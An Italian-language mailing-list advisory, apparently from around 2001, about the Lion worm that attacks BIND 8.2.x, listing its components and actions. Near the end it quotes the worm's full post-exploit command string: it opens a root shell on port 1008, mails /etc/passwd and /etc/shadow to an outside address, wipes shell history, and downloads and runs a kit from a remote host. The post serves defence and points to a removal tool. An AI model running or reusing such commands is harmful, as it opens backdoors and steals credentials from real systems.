[Tech] Nuovo worm

[Egyeki Gergely]

    Ciao!
 
   C'e' un nuovo worm, e si chiama lion ( 1i0n.sh ) e assomiglia molto a
 Ramen, il quale e' stato il precedente.
   www.sans.org/y2k/lion.htm
  In questo sito potete trovare un utiliy : lionfind per eliminare lion  
 sui vostri sistemi.
 
 Ma qualche giorni fa  Neil Long ha segnalato a Securityfocus, che il loro
 analizi SANS GIAC del lion non e' corretto.
 Non si tratta sul t0rn kit e non segnalano la porta 1008.
 E il loro utiliti non trova i varianti. ?! 
 
    Gia' ci sono varianti...
 
 
   il worm :
   contiene:
   
   - e' un variante di t0rnkit
   - pscan
   - randb ( rende ip randomizzati per pscan )
   - scrip tti di shell
   - precompilati exploiti di bind
   - utiliti per la cacellazione dei segni
 
  scopi:
 
  - bind 8.2 , 8.2.1 , 8.2.2 , 8.2.2-PX
 
  attaca dopo il rapporto pozitivo di pscan:
 
  - bindshell sulla porta 1008
  - manda in e-mail etc/shadow, etc/passwd + informazioni delle interfacce
  - download del KIT  ( lynx -dump)
  - untar , init
 
  init script:
  
  - rm /etc/host.deny
  - si mette dentro in rc.sysinit, per farsi funzionare al riavvio
     ( Red Hat , SUSE ? )
  - avvia
 
   Probabilmente si fonde sul TSIG exploit.
 

  Dopo l'exploit il packetto di TCP contiene:
 
 PATH='/usr/bin:/bin:/usr/loacal/bin:/usr/sbin:/sbin';export PATH; export
 TERM=vt100; rm -rf /dev/.lib; mkdir /dev.lib; cd /dev/.lib; echo '1008
 stream tcp nowait root /bin/sh sh'>> /etc/inetd.conf; killall -HUP inetd;
 ifconfig -a >1i0n; cat /etc/passwd>>1i0n; cat /etc/shadow >>1i0n; mail
 1i0nip@china.com <1i0n; rm -fr 1i0n; rm -rf .bash_history; lynx -dump
 http://collion.51.net/crew.tgz> 1i0n.tgz; tar -zxvf 1ion.tgz; rm -rf
 1i0n.tgz; cd lib, ./1i0n.sh; exit
 
 
                       Ciao
                                          Geri